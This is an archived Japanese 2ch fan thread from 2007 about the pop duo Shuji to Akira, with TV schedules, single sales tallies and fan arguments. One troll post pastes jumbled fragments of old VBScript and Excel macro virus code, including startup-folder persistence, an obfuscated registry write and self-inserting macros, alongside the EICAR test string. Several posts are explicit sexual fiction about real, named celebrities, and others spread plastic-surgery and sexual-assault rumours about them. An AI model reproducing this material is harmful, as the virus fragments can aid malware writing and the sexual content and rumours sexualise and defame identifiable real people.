5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

網五@2

1 :( ゚ Д゚)人(´∀‘):2007/01/23(火) 13:13:14 ID:iC0C2Rug
                                .*  ∧__∧ *
                               *. ゜ ( ゚ Д゚) .゜* <Si!
┏━━━━━━━━━※網五校則 5箇条※━━━━━∪ ∪━━━━━┓
┃1:sage進行                                    .  ┃
┃2:実況禁止(出番が終わっても番組が終わるまでは実況になります).   ┃
┃3:同人話、担決め、他タレ話禁止                         ┃
┃4:荒らしや他タレ話してるレスは徹底スルー                      ┃
┃5:片方を褒めて片方を貶す事は禁止                      ┃
┃∧,_∧                                         ┃
 (´∀‘)<ミ・アミーゴ☆                                .┃
 OUUO ━━━━━━━━━━━━━━━━━━━━━━━━━━━┛


前スレ 網五@1
http://tv9.2ch.net/test/read.cgi/jr/1154620772/

ジャニーズ2板以前
前スレ@蟻 修二と彰14
http://tv7.2ch.net/test/read.cgi/jr/1149349284/
前スレ@梨 江東区51区
http://tv7.2ch.net/test/read.cgi/jr2/1149416890/

2 :ユー&名無しネ:2007/01/23(火) 13:16:10 ID:iC0C2Rug
●蟻スレは元は深山隔離スレでした●
・深山(この板に慣れていない人)はこの板の空気に慣れて下さい
・カタカナは半角で
・レスする時は「>」アンカーは一つで「>>」は禁止
・「。(句点)」はゴミ付きになるのでやめましょう
・教えてちゃん、クレクレ厨、自分語りは嫌われるのでやめましょう
・古参の姐さん方は氏ね、ロムれと言わず優しく指導ヨロ
・板やスレ内での用語などわからないことがあったら以下のスレで勉強しましょう
「くだらない質問はここに」http://tv7.2ch.net/test/read.cgi/jr/1152607557/
「初心者案内スレッド」http://tv7.2ch.net/test/read.cgi/jr/1152866225/

3 :( ゚ Д゚)人(´∀‘):2007/01/23(火) 13:17:41 ID:iC0C2Rug
2005年
【8月】
◎8月ズーミン弁当募集VTR
19日(金)ズーミン弁当選考予告

【9月】
2日(金)ズーミン弁当選考会
25日(日)@サプリ男前ニュース

【10月】
9日(日)ザ・サンデー(目VTR)
11日(火)ズーミン(堀北VTRに目P映り込み)
12日(水)野ブタナビ
13日(木)ズーミン(会見5時台、6時台、7時台)、ラジかる(目VTR)、野ブタナビ
14日(金)ズーミン(6時台生〜7時台生)、情報ツウ(生)、おもいっきり(生)、
      ザワイド(生)、シオドメディア、プラス1、野ブタナビ
15日(土)ズムサタ(7:27〜生)、チャンプ、メレンゲ(目)、直前SP、おじゃマンボウ
18日(火)ズーミン(6時台・PV) サルヂエPR
19日(水)サルヂエSP
20日(木)なるトモ!(古米情報のみ)ラジかる!!(P)
21日(金)ズーミン(弁当撮影風景)
22日(土)ズムサタ
23日(日)歌笑、サンデーナビゲーション(コメント・Nack5)
25日(火)伊東家(目)
27日(木)うたばん
28日(金)タモステ (ミニステも)
29日(土)野ブタ。ダイジェストPR(仮題)、ズムサタ
30日(日)サンデーナビゲーション(目Pコメント・Nack5)
31日(月)HEY!HEY!HEY!、ラジアン(目コメント)

4 :( ゚ Д゚)人(´∀‘):2007/01/23(火) 13:19:24 ID:iC0C2Rug
【11月】
2日(水)らじかる(目)、Junk2(目コメント・TBSラジオ)
3日(木)うたばん
4日(金)タモステ・音楽戦士・ズーミン(7時台ロケ撮影) 情報ツウ・ザワイド・+1
5日(土)野ブタをプロデュースこれで完璧だっちゃSP・ズムサタ
8日(火)ズーミン(CD1位コメント)、音楽楽園(WOWOW・PV)
10日(木)ランキング(1位PV数秒のみ・テレ朝)11日(金)ズーミン(振り付け指導)、タモステ
12日(土)ズムサタ
18日(金)ズーミン(堀北の印象について)
19日(土)ズムサタ・チャンプ・マンボウ
20日(日)歌ワラ
26日(土)ズムサタ・おじゃマンボウ・野ブタPR
30日(水)1億3000万人が選ぶベストアーチスト2005

【12月】
2日(金)ズームイン
3日(土)ズムサタ
7日(水)ズームイン
9日(金)ズームイン
10日(土)ズムサタ・野ブタ最終回直前SP
15日(木)なるとも
16日(金)ズームイン(生)・なるとも・シオドメディア(情報ツウ・ザワイ・おもいっきり・プラスワン)
17日(土)ズムサタ・チャンプ・おじゃマンボウ
23日(金)ズーミン・情報ツウ・スーパーJチャンネル・タモスペ
24日(土)ズムサタ・メレンゲ・BS週間シティー情報
25日(日)BS週間シティー情報(再)
31日(土)PRIDE男祭り2005・牛紺

5 :( ゚ Д゚)人(´∀‘):2007/01/23(火) 13:21:08 ID:iC0C2Rug
2006年
【1月】
11日(水)成人式
12日(木)成人式WS
17日(火)第78回選抜高校野球の入場行進曲に「青春アミーゴ」決定

【2月】
17日(金)タモステMトピア(青春アミーゴ秘話)
23日(木)目20歳誕生日

【3月】
1日(水)TV LIFE
2日(木)家族で選ぶ日本の歌収録
8日(水)TVガイド・TV LIFE
9日(木)ゴールドディスク大賞(BS-2放送)
18日(土)家族で選ぶ日本の歌
23日(木)第78回選抜高校野球開幕(入場行進曲)

【4月】
9日(日)P21歳誕生日
5日(水)野ブタ。をプロデュースDVD-BOX発売

【6月】
2日(金)タモステ Pソロ『抱いてセニョリータ』(目サプライズ出演)

【8月】
26日(土)〜27日(日)24時間テレビ29愛は地球を救う
゚・*:.。..。.:*・゜゚・*:.。. .。.:*・゜゚・*:.。..。.:*・゜゚・*:.。. .。.:*・゜゚・*:.。. .。.:*・゜
           ( ゚ Д゚)人(´∀‘)
             目P復活!!
゚・*:.。..。.:*・゜゚・*:.。. .。.:*・゜゚・*:.。..。.:*・゜゚・*:.。. .。.:*・゜゚・*:.。. .。.:*・゜


6 :( ゚ Д゚)人(´∀‘):2007/01/23(火) 13:22:27 ID:iC0C2Rug
【11月】
29日(水)1億3000万人が選ぶベストアーチスト2006(青春アミーゴ振り)

7 :ユー&名無しネ:2007/01/23(火) 13:37:34 ID:8XqHX4Ki
>1
乙アミーゴ!
つ 旦~

8 :ユー&名無しネ:2007/01/23(火) 16:07:40 ID:nbzSZfmM
>1
姐さん乙

9 :ユー&名無しネ:2007/01/23(火) 18:35:57 ID:4c7U4J5I
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


10 :ユー&名無しネ:2007/01/23(火) 21:12:42 ID:vg9FZuC3
>1

つ【ちくわぶ】

11 :ユー&名無しネ:2007/01/23(火) 22:08:28 ID:0OmCGnyJ


12 :ユー&名無しネ:2007/01/24(水) 00:21:02 ID:uAETOEY4
糞スレ立てるなドブス!!

13 :ユー&名無しネ:2007/01/24(水) 00:55:46 ID:wW/fq7JZ
>1
乙です!キャー(∩゚ Д゚)∩∩(´∀‘∩)キャー
テンプラもステチ

14 :ユー&名無しネ:2007/01/24(水) 08:54:02 ID:WvwD0Mgg
>1
乙です

15 :ユー&名無しネ:2007/01/25(木) 00:44:57 ID:3eaSrY6s
>13
こういうのってマジやめて欲しいわ

16 :ユー&名無しネ:2007/01/25(木) 02:00:08 ID:/evOVYc4
目Pなんか仕事での付き合いしかないのにスレいらねー
目厨きもいし

17 :ユー&名無しネ:2007/01/25(木) 02:04:21 ID:/evOVYc4
     ∧,,∧
     /゜ `). ∧,,_∧
    (ёノ  (; ゚ Д゚)
   c(,_uuノ OuuO) 
   真AA

18 :ユー&名無しネ:2007/01/26(金) 13:32:38 ID:Wvw5E5hT
歴代ジャニシングルランキング(最新オリコン版)
(*1)2003/03/05 世界に一つだけの花(SMAP).....................257万1766
(*2)1997/07/21 硝子の少年(KinKi Kids).......................178万6270
(*3)1997/11/12 愛されるより愛したい(KinKi Kids).............163万9380
(*4)2005/11/02 青春アミーゴ(修二と彰/亀梨和也・山下智久) .....162万5419
(*5)1998/01/14 夜空ノムコウ(SMAP)...........................162万0720

青春アミーゴ 修二と彰
52万0419→25万0108→17万4788→11万4034→8万2368
→6万1243→4万6252→8万1835→10万8006(2週合算)
→3万3051→2万8588→2万3486→1万7830→1万0697
→8,373→6,007→5,200→3,566→3,223
→4,358→3,292→3,010→2,665→1,802
→1,796→2,047→1,336→1,237→1,092
→1,680→1,333→972→829→1,027
→851→700→935→675→515
→540→698→617→1,387→950
→772→641→643→650→713
→609→524→498→406→348
→***→***→445→496→558
→1563(2週合算)→604→531 (64)
累計 162万5419


久しぶりに売上更新しましたノシ
新スレ乙です
細々とだけどアミーゴはまだまだ売れ続けています
いったいどこまで売れるんだろうか
すご過ぎるよアミーゴ

19 :ユー&名無しネ:2007/01/26(金) 16:29:18 ID:uSnFFA7W
>18姐さん
いつもいつもd!です
そして乙です

20 :ユー&名無しネ:2007/01/26(金) 17:33:43 ID:luQPBuor
>18
姐さん売上げ更新dd
アミーゴまだまだ売れててテラ嬉しいな

21 :ユー&名無しネ:2007/01/26(金) 19:04:05 ID:M3ooNzTh
>18
姐さんdd!
ホント凄いよアミーゴ

22 :ユー&名無しネ:2007/01/27(土) 00:44:16 ID:bhX+Vp6e
今日カラオケ逝ったら
先月のランキング1位がアミーゴだった(*´∀`)

23 :ユー&名無しネ:2007/01/27(土) 01:01:18 ID:6pczGs9k
mjdk
アミーゴ人気だな(w

24 :ユー&名無しネ:2007/01/27(土) 14:58:14 ID:k2dDLYfZ
芸能人整形疑惑2大巨頭のひとり亀梨和也の幼少写真にメンバー「面影ないね」

1 :飼育係φ ★ :2007/01/22(月) 20:58:28 0
KAT−TUNの亀梨和也の幼少期から小学校1年生までの写真数枚が1/21放送の「ウタワラ」で披露された。
しかし、今の顔と違いすぎるため、幼少期の写真を見た
和田アキ子やKAT−TUNのメンバー、松浦亜弥などからどよめきがおこり「面影ないよね」

亀梨の両親によると「小さい頃から甘いマスクでお母さんたちのアイドルだった」いうほど
赤ちゃん時代の亀梨は目が一重でそれなりにかわいくりりしい顔。
今の亀梨は切れ長のもろ整形の二重のため面影はなかった。

「人の写真持ってきたんですかねえ」と冷たい田中、
「選りすぐりの写真持って来たんでしょうね」と冷ややかな上田、
「言われないと(亀梨くんって)わかんないですねぇ〜」とそっけないあやや、
「写真に(今の亀梨の)面影がないよね」と今の悪人ヅラと違い過ぎる顔にツッコむ松潤と疑いのコメントばかり。

亀梨の幼少期の画像はNGのようで雑誌やネットでも見当たらず
ちなみに亀梨和也には整形疑惑がネットでささやかれています。

男ばかりの4人兄弟の3番目のため、格闘技ごっこは日常茶飯事。
とくに食事時は油断していると、兄弟に食べられるため
「詰め込めるだけ口に詰めてました」と亀梨
幼稚園の頃の夏祭りの写真ではカキ氷を手づかみで食べていた。
それで今のあの何でも欲しがる欲張りで図々しくて出しゃばりな性格が出来上がったのも納得だろう。

小学校のときは「野球とスカートめくりをしてた。女子がめくらしてくれてた」
と亀梨が発言しスタジオは一瞬しらけムードになっていた。
慌てた亀梨は中丸に「中丸はしてただろ、こいつ昔からむっつりですから」と振ったが
中丸に「(スカートめくり)してないですよ」と即否定されていた。
(以上1/21放送「ウタワラ」)

25 :ユー&名無しネ:2007/01/27(土) 16:26:13 ID:3QZ2CSzY
>18
遅れましたが姐さんd!
アミーゴは本当にロングセラーですね
  ∧,,∧ .∧,,_∧
 (´∀‘)( ゚ Д゚)
 c(,_uuノ OuuO)

26 :ユー&名無しネ:2007/01/27(土) 21:00:00 ID:bG3dMw+f
アミーゴ発売からもう1年以上立つのにランキングから消えないのスゴス(゚Д゚)復活ないのがサミチイ

27 :ユー&名無しネ:2007/01/29(月) 11:51:54 ID:xvUQjEv2
>26
改行しましょうや

28 :ユー&名無しネ:2007/01/30(火) 20:57:11 ID:PoZf+Q3h
歌は売れたが目PよりオムPのがよっぽど仲良いしキャワ

29 :ユー&名無しネ:2007/01/30(火) 22:03:57 ID:pIm/QL0M
>28
たまたまドラマで共演したからじゃん
オムもしばらくしたらPP言わなくなるよ

30 :ユー&名無しネ:2007/01/30(火) 22:24:46 ID:PoZf+Q3h
オムは目にPを泣かせたらお前を殴るとか言ってたくらい昔から仲良い

31 :ユー&名無しネ:2007/01/31(水) 01:03:39 ID:SZvAf1Ic
>29
スルースルー

32 :ユー&名無しネ:2007/01/31(水) 01:58:20 ID:2VH9dlGP
>30
オムとPは高校時代殺伐でそれ以降マターク接点なかったよ
それはお互い話してるジャン

33 :ユー&名無しネ:2007/01/31(水) 02:42:50 ID:nYrBsbQI
>32
サマリや昔の少クラ見ても殺伐とした感じは
受けなかった
少なくとも目とよりは仲良かったのでは

ここって本当に目担ばかりだね

34 :ユー&名無しネ:2007/01/31(水) 04:35:16 ID:td2+bXaO
サマリに少クラ…

35 :ユー&名無しネ:2007/01/31(水) 07:12:29 ID:cgNL/lEL
オムはU君と合わなかったんじゃない?ノリが違いそう
PとU君はいつも一緒だったから合わないヤシといるの辛そうじゃん
それに学校でまでジャニ同士で固まってたくなかったかもよ
                        まぁ勝手な妄想だけど(w

36 :ユー&名無しネ:2007/01/31(水) 08:24:31 ID:SZvAf1Ic
スレチだ
お約束嫁

37 :ユー&名無しネ:2007/01/31(水) 09:17:48 ID:h2RHcDng
>29はアミーゴ担とは思えない

38 :ユー&名無しネ:2007/01/31(水) 20:23:23 ID:jAvl50s9
>33
オムの友達への手紙の回は見ましたか?
Pがオムを無視していることへの裏づけともいえる手紙でした
堀の時からのデフォですよ

39 :ユー&名無しネ:2007/01/31(水) 23:52:38 ID:xaw2PN7S
Pはジュニアの時地方のホテルで宿泊するときいつも襲われそうだったから
親しい奴以外には身の危険を感じて親しくしたくなかったんだよ

40 :ユー&名無しネ:2007/02/01(木) 00:47:20 ID:uUq11xTs
('A`)

41 :ユー&名無しネ:2007/02/01(木) 02:18:05 ID:kOXQsHn2
>39
そんなPに襲われそうになった目って一体…

42 :ユー&名無しネ:2007/02/01(木) 07:56:37 ID:qq0Snfn8
何この流れ もういいよ

しかし最近絡みが少なくて寂しいなー
また忘れかけた頃のサプライズに期待

43 :ユー&名無しネ:2007/02/01(木) 08:46:51 ID:pGRnHKdA
>42
(´・ω・`)ネー

44 :ユー&名無しネ:2007/02/01(木) 18:40:16 ID:f0hi4CQG
>41
そんな話聞いた事ないがなんの時の話?
目P大スチだがPを目を追い掛け回すフォモ扱いすんのヤメテクレ

45 :ユー&名無しネ:2007/02/02(金) 17:30:18 ID:RnoGD5hR
41は目受け同人の読みすぎで現実と混同しちゃってるイタイ子

46 :ユー&名無しネ:2007/02/02(金) 23:16:33 ID:VJzLh7EG
目受ドジンは絶滅しろ
都合良くP利用すんな

47 :ユー&名無しネ:2007/02/02(金) 23:45:24 ID:Y+nvbRRY
いい加減に汁
出て逝ってくれ

48 :ユー&名無しネ:2007/02/03(土) 15:45:30 ID:UZyp09Hp
>44
元となる39はスルー?
Pちゃんは幸せだね盲目P担がいて

49 :ユー&名無しネ:2007/02/03(土) 16:16:36 ID:Q+3lKDtR
                                .*  ∧__∧ *
                               *. ゜ ( ゚ Д゚) .゜* <Si!
┏━━━━━━━━━※網五校則 5箇条※━━━━━∪ ∪━━━━━┓
┃1:sage進行                                    .  ┃
┃2:実況禁止(出番が終わっても番組が終わるまでは実況になります).   ┃
┃3:同人話、担決め、他タレ話禁止                         ┃
┃4:荒らしや他タレ話してるレスは徹底スルー                      ┃
┃5:片方を褒めて片方を貶す事は禁止                      ┃
┃∧,_∧                                         ┃
 (´∀‘)<ミ・アミーゴ☆                                .┃
 OUUO ━━━━━━━━━━━━━━━━━━━━━━━━━━━┛

50 :ユー&名無しネ:2007/02/04(日) 01:04:17 ID:IZfe9Xxz
かめなしとぴぴたん
かめはめ大王とぴーち姫

51 :ユー&名無しネ:2007/02/04(日) 04:51:11 ID:IZfe9Xxz
かめなしはぴぴたんを後ろからガバッと襲っていたなー
ぴぴたん寝てたっぽいけどきもかっただろうなカワイソス

52 :ユー&名無しネ:2007/02/04(日) 05:25:55 ID:IZfe9Xxz
>>48
ぴぴはかわゆすだし実際やばかったから
よこやまくんとか本気だったよあれ

かめなし先生は…りょたんとかに不細工とか整形とかいわれてますた(w
こけるわけにはいかないかつんの真ん中だからことしもごりぷ健在ですのでご安心を
濃いおたさん商売にうってつけの舞台と映画だべがんがれ

53 :ユー&名無しネ:2007/02/04(日) 05:35:27 ID:IZfe9Xxz
あとねーぴぴは女の子みたいにかわゆすだたから
じゃにの中でもあいどるだたとはにのにのの言
かめなし先生はすきな子にはいじわるしちゃうタイプだから
ぴぴにいじわるしちゃってきらわれちゃってたんだお
頭の回転はやいけどばかなのは残されたゆいいつの愛嬌とおも
ちなみにいま極端に露出ないのはこりずに顔面工事してる可能性高須くりにっく

54 :ユー&名無しネ:2007/02/04(日) 12:04:26 ID:zI2wa9Gg
そして誰もいなくなった

55 :ユー&名無しネ:2007/02/04(日) 16:18:56 ID:wOxgv2cc
何度言っても沸いて来るからさ

話題待ちしとくかな

56 :ユー&名無しネ:2007/02/07(水) 01:49:52 ID:bd595Bbq
>48
>39は本当にあった事かもしれないと思えるけど
P→目はあり得ネーとここに居る誰もが即行で思えるからだろうね

57 :ユー&名無しネ:2007/02/07(水) 08:35:53 ID:O5ouW+yG
>55
115で話題待ちノシ

58 :ユー&名無しネ:2007/02/07(水) 16:28:06 ID:v/WAGmgD
片目誌伝言板で目がPに返事かいてるね

59 :ユー&名無しネ:2007/02/07(水) 16:51:22 ID:0kc6z/K+
>58
ヲタ誌を買わない自分にkwskヨロです

60 :ユー&名無しネ:2007/02/07(水) 17:33:58 ID:7lAL0tmA
>58
本屋に行ってくる

61 :ユー&名無しネ:2007/02/07(水) 17:59:31 ID:O5ouW+yG
>58
情報dd
115で待っててヨカタ(w

62 :ユー&名無しネ:2007/02/07(水) 21:40:58 ID:+kWA/BhM
>56
そうですね
ここにいる誰もが盲目P担だからですね

63 :ユー&名無しネ:2007/02/08(木) 00:45:49 ID:an2+86co
自分は某ヲタだが覗いてるよ

64 :ユー&名無しネ:2007/02/08(木) 05:43:34 ID:bw+fGLRc
>56
おまいがP受けドジンだって事もここにいる誰もが即効で分かるけどね

65 :ユー&名無しネ:2007/02/08(木) 21:11:44 ID:1pCrpvFM
片目誌見てきたノシ
目らしい返事だな(w

66 :ユー&名無しネ:2007/02/09(金) 00:42:59 ID:PLCyIULu
>64は目受けドジン?

67 :変態フォモ彰×ナース修二タンv:2007/02/09(金) 06:05:24 ID:cn0CSorJ
「ん…あれ?看護婦さん‥‥ここ、どうしたの?病気?」
「‥‥やッ!?」
不意に、太股の間を這うようにスカートの中に侵入した彰の手が伝ってきたかと思えば‥‥突然、
俺のすっかり反応しきった自身をわしづかみにされた。
「かーんごふさぁーん?‥‥ね、ここがいいの?」
「ん、ん…やっ、めて…ぁき…」
彰の手で、ぐにぐにと容赦なく揉まれる。
「あ、きらッ‥‥マジやめろ、って…!イッちゃ…ぅ」
「いーよイッちゃって…修二苦しいデショ?」
そう言うと、彰はその指の爪で…俺自身の先端を引っ掻いた。
「ぃあッ、や…あぁ…ッ!!」
いくらなんでも早すぎる。とは思ったけれど…
その刺激に耐えられなかった俺の自身は熱い白濁を吐き出すと、薄桃色のナース服をじわじわと濃い
桃色へと変化させた。
「修二可愛いのー」
「可愛く…ねぇっ!」
信じらんねぇ、信じらんねぇ…!!彰なんかの手で‥‥手、だけで…イカされちまった…
「ぅ‥っくそ…」
「修二泣かなーいでー?」
何だか途端に自分が情けなくなって……目から熱いものが溢れてきたけれど………大丈夫。
彰がにっこり微笑んで俺の頭を撫でてくれたから。それだけで俺は、安心して心が落ち着いて。
またいもの俺に戻れるんだ。
優しい彰、好きかも
「あー…修二くん…」
「…何」
「修二くんにね、おっきな注射をしてあげたいのよーん」
言いながら、俺の尻に押し付けられる‥‥熱くてかたい‥‥臨戦態勢万全な彰曰くぶっとい注射。
‥‥前言撤回。
エロい彰、大嫌いだ

68 :変態フォモ彰×ナース修二タンv:2007/02/09(金) 06:06:36 ID:cn0CSorJ
「…俺、こうやって看護婦さんな修二を苛めてみたかったのよーん…」
「ありえねぇ‥‥‥」
マジで。
この変態を誰かどうにかしてくれ。
ギシギシと、俺のベッドのスプリングが軋む。仮にも風邪を引いている俺に負担を掛けないようにと
修二が、上になってくれているんだけど‥‥
「あ、ぁ゙…ふ、んんぅ…ッ」
「しゅーじ‥っ」
足を伸ばして座っている俺の上に乗り、一生懸命腰を引いては下ろしてくれている修二。何度しても
決して緩くならず処女のままの締め付けを保つアヌス。うっかりすると先にイッてしまいそうになる
くらいに心地が良すぎる。
「は、ぁ、あぅ‥‥あ、きら‥‥ッ!」
しかもそれだけには限らず…俺の首にその細腕を絡め、耳元に掛かるは荒く甘い吐息と喘ぎ声。
‥‥こんな可愛い彼女、もう絶対に、離れられません。離してなんか、やらないのよーん。
「修二、くん」
「ひぁんッ!」
彼の細い腰をしっかりとつかんで落とさせ、動かないように押さえ付ける。
修二くんは自分が好きなように動くもんだから何度イッてもそのまま。お陰で薄い桃色だったはずの
ナース服は修二くんの白濁液でぐっちょり濡れている。
‥‥ちょーエロい!

69 :ユー&名無しネ:2007/02/09(金) 22:27:10 ID:cJIQaDkG
目がナース服とか西目のウエディング姿思い出して吐きそうになるわ

70 :ユー&名無しネ:2007/02/09(金) 22:46:30 ID:FoiNusF7
少蔵プレミアムで目がPへコメするんだね

71 :ユー&名無しネ:2007/02/10(土) 00:14:48 ID:gBQnOKl+
石鹸の活動が始まっても目に寄生するP様

72 :ユー&名無しネ:2007/02/10(土) 00:20:41 ID:X3mGh4uv
>70
mjdk
自分少蔵観れ茄子orz

73 :ユー&名無しネ:2007/02/10(土) 01:19:11 ID:smIZJAz/
>71
このまま目の仕事が無いままだと目がPに寄生しはじめますか?

74 :ユー&名無しネ:2007/02/10(土) 01:19:53 ID:dejEDNrN
>71
また出た(w

75 :ユー&名無しネ:2007/02/10(土) 01:46:37 ID:lrPrVu0O
目に仕事ないから結婚してもヒモ状態

●キョンキョンにも勇気!? 秋吉久美子、元気と活気

自身の息子よりも若い26歳下の日系米国人との“復縁結婚”が発覚した女優、秋吉久美子(52)=写真。
この“年の差婚”が芸能界にビミョーな影響を与えそうだ。

「キョンキョンにも勇気を与えましたね」と語るのは、芸能リポーターの梨元勝氏。

タレント、小泉今日子(41)は昨年4月、KAT−TUN・亀梨和也(20)との熱愛が写真誌で報じられた。
秋吉の結婚は、芸能界の“年の差カップル”に大きな影響を与えそうだ。

76 :ユー&名無しネ:2007/02/10(土) 10:58:22 ID:WCRCWbiW
>70
dです!
目がアミーゴについて語るのか

77 :ユー&名無しネ:2007/02/10(土) 13:40:51 ID:gOC3xw6L
>69
想像もなにも実際きたんだよ
あの目はテラカワユスだった

78 :ユー&名無しネ:2007/02/10(土) 21:17:18 ID:lrPrVu0O
★亀梨和也×小泉今日子★
亀梨「…今日子のココ‥‥すっげーやわらかくて入っちゃったのに…ナカはキツイなー」
小泉「解説なん、て‥‥いーからっ」
だからはやくちょうだい。…なんて、今日子の目が見上げてくる。いいんですか?遠慮なく食べちゃいますよ…子猫さん?
亀梨「…いくかんね」
今日子の腰をつかんで持ち上げ、ヌルつく蕾に固くそそり立った亀梨自身を押し付けると、誘うようにヒクつくそことひたすらに頷く今日子。
お言葉に甘えて、グプリと。亀梨は一気に最奥まで腰を進めた。
小泉「は、ぁ‥ッ!」
亀梨「…っキツ…!」
入口はやわらかいくせに奥へ行くほどキツイ。抵抗してくる熱くやわらかい内壁に逆らって進むとありえないくらいに今日子の中はキモチイイ。
亀梨「今日子ちゃんったら、名器。」
小泉「そゆこと…ゆわないでバカっ!‥‥ぁ」
怒鳴った拍子にお腹に力が加わったらしく、しめつけてくる今日子ちゃん。
真っ赤に染まった今日子を見たら、更に後孔を拡張するように亀梨自身が育ってしまう。
小泉「いぁッ‥かず、や」
亀梨「も‥‥ごめ、限界」
まだ入れたばかりなのに。まだまだ今日子のナカにいたいのに…。あまりにも、心地良すぎる。
亀梨「…いくよ」
折れてしまいそうな今日子の細い腰を抱え、亀梨は大きく腰をグラインドさせる。
今日子の背が弓なりになれば細かくリズムを刻み、ふとした瞬間に腰を回転させてプクリと膨らんだ場所をえぐりあげて。
小泉「ひぁッあ、やぅ‥‥あぁッ!」
ここが外だなんて事も忘れてひたすらに。
今日子の喘ぎと濡れた水音。肌のぶつかりあう音が織り成す狂想曲。‥‥すべてが俺、亀梨と今日子を狂わせる。
小泉「んんーッも、だめ‥かず、やァ…っ」
亀梨「ん、一緒…いこ?」
今日子の腕が亀梨の首筋にまわされ、コクコク頷いたのと同時に腰を後孔から抜けるほど引き、一気に奥へと叩き付ける。
ズコバコ  ,ィヘ⌒ヽフ  ブヒブヒ
    / (; ゜ё`.)) -=3   ←亀梨
 ε//   し ヘ⌒ヽフ   アアン
  ( (  _,.ノ( *・ω・)) -=3   ←今日子ちゃん
   し しー し─J さ
低視聴率にも関わらずセクロスしまくりの亀梨×今日子

79 :ユー&名無しネ:2007/02/10(土) 21:23:17 ID:lrPrVu0O
「今日子…どうして欲しい?」

意地悪く聞く亀梨をキッと睨み付けるが、今の状況では分が悪いのは今日子。
案の定、カリッと左乳首を噛まれ、右は手のひらにこねくり回された。

今日子「やっ、やぁっ!やだぁぁっ!!」
亀梨「ふ、まだ触ってもいないのに、すごいことになってるよ?」

亀梨が見ている方に無意識に目線を向けると、ジーパンを濡らしてすっかり主張していた。

「やっ、だ…かずやっ」

恥ずかしさともどかしさで、亀梨に目で懇願するが、許してもらえない。

亀梨「今日子、ちゃんと言って?」
今日子「んっ、ムリぃ…ひゃあぁ!」

一気にジーパンを下ろされ、急に外気に触れて驚く今日子をよそに、亀梨はその白い太ももに口づける。
「あぁ、ン…」
「今日子、腰揺れてるよ」

微笑を浮かべながら、しかし肝心な所には触れようとしない。

「ね、かず…も、おねが…あぁぁ」
苦しさで涙が頬を覆い、なんとか愛撫から逃れようともがくその姿はなんとも欲情的で、亀梨の理性を吹っ飛ばした。

ズコバコ  ,ィヘ⌒ヽフ  ブヒブヒ
    / (; ゜ё`.)) -=3   ←亀梨
 ε//   し ヘ⌒ヽフ   アアン
  ( (  _,.ノ( *・ω・)) -=3   ←今日子ちゃん
   し しー し─J さ
低視聴率にも関わらずセクロスしまくりの亀梨×今日子

80 :ユー&名無しネ:2007/02/11(日) 07:54:33 ID:o+31ULuL
目様はPーチ姫を軍団山本に引き寄せないでホスィ
目様に関わると碌な事がナス

81 :ユー&名無しネ:2007/02/11(日) 08:09:51 ID:o+31ULuL
まぁ今や目様とPーチ姫仕事の接点も華麗に消えて安心( ´∀`)ヨカタ

82 :ユー&名無しネ:2007/02/12(月) 11:16:41 ID:EFabQsq1
来週の少蔵プレでVTR出演するよ
昨日の1人アミーゴ新鮮だった

83 :ユー&名無しネ:2007/02/12(月) 11:29:33 ID:Eh4H6qIO
>82
彰の一人アミーゴ見れなかったよ…orz
来週は友達に頼んで録画してもらう(´・ω・`)

84 :ユー&名無しネ:2007/02/13(火) 15:27:14 ID:bVWK26LL
>83
ハイビ見れない?今日再放送あるけど

85 :ユー&名無しネ:2007/02/13(火) 18:30:03 ID:o5veH/Fg
>84 dです!
でもハイビも見れませぬ…(´・ω・`)
ようつべで探してみます

86 :ユー&名無しネ:2007/02/14(水) 01:49:47 ID:9XfwaBJy
Pチャンの一人アミーゴはとっても甘〜いキャワソング

87 :ユー&名無しネ:2007/02/14(水) 08:44:31 ID:4zm7Seod
見逃した…orz

88 :ユー&名無しネ:2007/02/14(水) 08:53:35 ID:BjwhVTdA
一人アミーゴはチト寂しいな

89 :ユー&名無しネ:2007/02/14(水) 23:53:21 ID:MwlVwrjF
      。*☆∴  。☆∵。
     ∴◆∵★.。★∴゚★*
     。☆*  ゚☆*   ゚☆
     *★。 Happy!!   *★
     ∵☆* Valentine*Ψ。
      ゚★。     。★*
       ∵☆*  *☆∵゚
        ∵★*゚★∵
           *★*



90 :ユー&名無しネ:2007/02/15(木) 03:43:59 ID:JSt2LzKR
>88
目のアレンジされた1人アミーゴとどっちがorzだった?

91 :ユー&名無しネ:2007/02/15(木) 09:02:42 ID:9+plbb2q
>90
自分>88さんじゃナスだがPのアミーゴはアレンジが原曲のままだったので
何の抵抗もなく2人アミーゴと同じ感覚で見れたよ
よって目の1人アミーゴの方が比べるとorz

92 :ユー&名無しネ:2007/02/15(木) 10:25:56 ID:xoW2BqLA
Pのはサビの部分だけなので残念

93 :ユー&名無しネ:2007/02/15(木) 11:25:34 ID:jwsAUyZR
最後のところは空見てる感じだたね
続編のセニョと一緒に歌ってくれてチョトウレシス

94 :ユー&名無しネ:2007/02/15(木) 21:45:27 ID:JeWSgWQN
Pは歌が(ryだからな…どっちも良かったってことで(w

95 :ユー&名無しネ:2007/02/15(木) 23:42:01 ID:oWcbO2Ax
               ∧_∧
              ( ゜ё`.) -=3 <そろそろ始めようか今日子
             (,,う;;;;;;;;;;;;;;;;'(,,)  ←亀蟲 
             /,;;;'" ,,,,  !;;;)    ∧_∧<イやン和くんのスケベ
              ゙! (U) l、    ( ・ω・*)←今日子ちゃん 
